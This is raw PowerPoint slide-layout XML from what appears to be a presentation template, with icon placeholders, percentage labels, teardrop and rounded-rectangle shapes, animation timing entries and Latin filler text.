                  <a:pt x="113363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54" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3947171" y="2565575"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7572830" y="2565575"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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1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1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459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" accel="100000" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="50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1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1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1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1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1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1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1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51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1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5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1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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48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1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51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459" decel="100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" accel="100000" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="50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6500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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1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1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1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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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1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51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1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8500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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1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51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1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9500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="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1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0500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="77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1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51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459" decel="100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" accel="100000" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="50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1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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1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1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1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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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1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51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1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13500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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1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51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1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14500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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1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15500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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16000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11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16500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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17000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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17500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13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18000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="136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18500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="140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4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19000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="144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4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>
                            <p:stCondLst>
                              <p:cond delay="19500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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0" dur="3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3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2" dur="3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20000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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6" dur="3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3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8" dur="30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" grpId="0" animBg="1"/>
      <p:bldP spid="13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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="1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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="1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1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10"/>
                        <p:tgtEl>
                          <p:spTgt spid="26"/>
                        </p:tgtEl>
                      </p:cBhvr>
                    </p:animEffect>
                    <p:anim calcmode="lin" valueType="num">
                      <p:cBhvr>
                        <p:cTn dur="51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1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1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10"/>
                        <p:tgtEl>
                          <p:spTgt spid="28"/>
                        </p:tgtEl>
                      </p:cBhvr>
                    </p:animEffect>
                    <p:anim calcmode="lin" valueType="num">
                      <p:cBhvr>
                        <p:cTn dur="51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1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8" grpId="0" animBg="1"/>
      <p:bldP spid="39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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="3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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="3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1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10"/>
                        <p:tgtEl>
                          <p:spTgt spid="40"/>
                        </p:tgtEl>
                      </p:cBhvr>
                    </p:animEffect>
                    <p:anim calcmode="lin" valueType="num">
                      <p:cBhvr>
                        <p:cTn dur="510" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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1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10"/>
                        <p:tgtEl>
                          <p:spTgt spid="42"/>
                        </p:tgtEl>
                      </p:cBhvr>
                    </p:animEffect>
                    <p:anim calcmode="lin" valueType="num">
                      <p:cBhvr>
                        <p:cTn dur="510" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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3" grpId="0" animBg="1"/>
      <p:bldP spid="44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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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1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5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10"/>
                        <p:tgtEl>
                          <p:spTgt spid="45"/>
                        </p:tgtEl>
                      </p:cBhvr>
                    </p:animEffect>
                    <p:anim calcmode="lin" valueType="num">
                      <p:cBhvr>
                        <p:cTn dur="510" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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10"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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7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10"/>
                        <p:tgtEl>
                          <p:spTgt spid="47"/>
                        </p:tgtEl>
                      </p:cBhvr>
                    </p:animEffect>
                    <p:anim calcmode="lin" valueType="num">
                      <p:cBhvr>
                        <p:cTn dur="510" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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10" fill="hold"/>
                        <p:tgtEl>
                          <p:spTgt spid="4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animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0" animBg="1"/>
      <p:bldP spid="37" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="0"/>
      <p:bldP spid="52" grpId="0"/>
      <p:bldP spid="53" grpId="0"/>
      <p:bldP spid="54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5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ic lis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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rounded Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 21"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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0" name="Teardrop 29"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13482192">
            <a:off x="1282930" y="1573861"/>
            <a:ext cx="2709581" cy="2438623"/>
          </a:xfrm>
          <a:prstGeom prst="teardrop">
            <a:avLst>
              <a:gd name="adj" fmla="val 107954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Teardrop 32"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13482192">
            <a:off x="4993448" y="1573861"/>
            <a:ext cx="2709581" cy="2438623"/>
          </a:xfrm>
          <a:prstGeom prst="teardrop">
            <a:avLst>
              <a:gd name="adj" fmla="val 10795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Teardrop 33"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13482192">
            <a:off x="8921272" y="1573860"/>
            <a:ext cx="2709581" cy="2438623"/>
          </a:xfrm>
          <a:prstGeom prst="teardrop">
            <a:avLst>
              <a:gd name="adj" fmla="val 107954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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751186" y="1897750"/>
            <a:ext cx="1803879" cy="172798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0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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="56" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499097" y="1897750"/>
            <a:ext cx="1803879" cy="172798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0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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="60" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9319682" y="1897750"/>
            <a:ext cx="1803879" cy="172798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0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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rounded Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067504" y="4549516"/>
            <a:ext cx="405696" cy="2786004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1608669" y="5134498"/>
            <a:ext cx="2500489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6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50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1608669" y="5499631"/>
            <a:ext cx="2500489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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="55" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608669" y="4554056"/>
            <a:ext cx="2500489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accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rounded Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815415" y="4549516"/>
            <a:ext cx="405696" cy="2786004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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="57" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356580" y="5134498"/>
            <a:ext cx="2500489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6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54" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="58" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356580" y="5499631"/>
            <a:ext cx="2500489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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="59" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356580" y="4554056"/>
            <a:ext cx="2500489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accent2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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rounded Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534400" y="4549514"/>
            <a:ext cx="405696" cy="2786005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7" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="61" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9075565" y="5134498"/>
            <a:ext cx="2500489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6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58" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="62" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9075565" y="5499631"/>
            <a:ext cx="2500489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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="63" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9075565" y="4554056"/>
            <a:ext cx="2500489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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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3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3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3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3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3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3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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="4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3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3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3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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49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900" decel="100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4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400" fill="hold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400" fill="hold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4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69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900" decel="100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40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4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4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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="89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900" decel="100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400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4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4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 animBg="1"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="35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3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3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3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3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3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3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8" grpId="0" animBg="1"/>
      <p:bldP spid="4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51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5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5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2" grpId="0" animBg="1"/>
      <p:bldP spid="53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3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5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55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5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5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animBg="1"/>
      <p:bldP spid="57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7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5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59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5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5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ic lis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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-406400" y="1715377"/>
            <a:ext cx="1879600" cy="782954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39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684392" y="1761099"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26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1805518" y="1544321"/>
            <a:ext cx="4121149" cy="440148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27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1805519" y="2025112"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-406400" y="3193657"/>
            <a:ext cx="1879600" cy="782954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43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684392" y="3239379"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805518" y="3022601"/>
            <a:ext cx="4121149" cy="440148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35" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="45" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805519" y="3503390"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rounded Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-406400" y="4671937"/>
            <a:ext cx="1879600" cy="782954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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="49" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684392" y="4717659"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="50" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805518" y="4500881"/>
            <a:ext cx="4121149" cy="440148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43" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="51" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805519" y="4981672"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
